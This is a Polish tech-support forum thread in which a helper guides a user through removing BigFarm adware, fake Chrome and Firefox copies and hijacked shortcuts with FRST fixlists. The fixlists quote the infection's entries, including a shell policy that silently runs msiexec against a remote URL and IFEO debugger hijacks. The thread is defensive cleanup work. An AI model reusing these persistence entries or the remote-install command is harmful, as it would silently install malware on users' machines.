Skocz do zawartości

Bigfarm - kolejny problem.


BEN

Rekomendowane odpowiedzi

Witam Wszystkich,

 

mam podobny problem jak tu: https://www.fixitpc.pl/topic/32598-bigfarm-itd/

dodam że nie jestem super biegły w sprawach naprawiania uszkodzonych rejestrów itp. nawet nie wiem jak to nazwać dokładnie.
Generalnie mam problem z przeglądarką, też mi się samoistnie zainstalowały podobne programy. Załączam raport z GMER i proszę o POMOC!!!

 

EDIT: BŁAGAM WAS O POMOC!!!
Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem.

logGMER.txt

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

Edytowane przez Rucek
Post wydzielam w osobny temat. Stosuj się proszę do zasad. Czekamy na Miszela. Nic nie ruszaj.
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

EDIT: BŁAGAM WAS O POMOC!!!

Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem.

 

Trudno bym odpisywał 24 godziny na dobę. Instrukcję będą sprecyzowane w takiej formie, że na pewno Sobie poradzisz. 

 


 

Są podstawione dwa prefabrykowane przeglądarki podszywające się pod Google Chroem oraz Mozilla FireFox. Oprócz tego wspomniany BigFarm zainfekował skróty przeglądarek. Amerykański adres ustawiony na routerze wydaję się być podejrzany (KLIK) - podaje instrukcje do zmiany.

 

Wygląda na to, że szybko się z tym uporamy. 

P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK.

 

1. Przez panel sterowania odinstaluj:

  • Zbędniki / Przestarzałe oprogramowanie: Spybot - Search & Destroy.
2. Zaloguj się do routera:
  • Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4
  • Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK.
Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony:

 

3. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Footjane
RemoveDirectory: C:\Users\Ben\AppData\Roaming\Footjane
RemoveDirectory: C:\Users\Ben\AppData\Local\Footjane
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
FirewallRules: [{DBEC1BB9-D594-4454-96FB-8C6E5E41D94D}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Ben\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Ben\AppData\Local\Firefox
RemoveDirectory: C:\Program Files (x86)\Firefox
FirewallRules: [{3567C494-B371-44EE-A8B6-9433F3F3BAE9}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMjq2RkM1RWVQOWZLMTE8FTk2MdY3MdF1MdYdFdqcNc== /q
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 
R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [104448 2017-05-15] (TODO: ) [brak podpisu cyfrowego] 
S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
C:\ProgramData\Microsoft\AppV\setup\install.dll
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll
U3 uxrirpow; \??\C:\Users\Ben\AppData\Local\Temp\uxrirpow.sys [X] 
C:\Users\Ben\Dysk Google\OFERTY BEN\SkyDrive.lnk
C:\Users\Ben\Dysk Google\EMCS\EMCS Offline Generator.lnk
C:\Users\Ben\Dysk Google\EMCS\Protektor.lnk
C:\Users\Ben\Dysk Google\EMCS\Nowy EMCS\EMCS Offline Generator.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla\Firefox
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Ben\AppData\Local\Mozilla\Firefox
C:\Users\Ben\AppData\Roaming\Mozilla\Firefox
C:\Users\Ben\AppData\Roaming\Profiles
CMD: ipconfig /flushdns 
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

4. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
  • Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji.
5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

footjane;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 

 

7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Dlaczego DNS nie zmienione? To celowe ustawienie jest?

 

Jeśli chodzi o resztę to jest już lepiej. Czas na poprawki i skan antywirusowy.

P.S: Jak proszę o skan to tylko o skan, a nie o skan + czyszczenie (patrz pkt. 6) Teraz odpuszczam, ale proszę czytaj moje punkty dokładnie.

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Footjane
DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Footjane
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox
DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Firefox
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\00
2017-04-21 13:57 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 16:52 - 2017-04-26 07:13 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-20 16:51 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\11
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Podsumuj również obecny stan systemu.

Odnośnik do komentarza

Jeszcze raz dziękuję za odpowiedź.
Z tymi DNSami to chyba celowo, nie wiem bo nie mam dostępu żeby to zmienić, jak skanowałem za pomocą linku czy połączenie z serwerem jest bezpieczne pokazywało że jest.
W załączniku raporty, mam nadzieję, że teraz niczego nie pochrzaniłem.

 

EDIT: Co do systemu, to faktycznie jest znacznie lepiej niż było, jedyne co to tak jakby wolniej się uruchamiał przy starcie. Tak jest wszystko w porządku.

Addition.txt

FRST.txt

malwarebytes.txt

Shortcut.txt

Odnośnik do komentarza

MBAM niczego nie wykrywa. 

System wyczyszczony z infekcji, a skoro piszesz, że problem infekcyjny ustąpił to będziemy kończyć. 

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

 

Jako, że świadczymy profesjonalną pomoc i tylko taką to związku z wolniejszym startem systemu pokieruję Ci do działu Windows 7, może tam ktoś coś na to poradzi. 

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...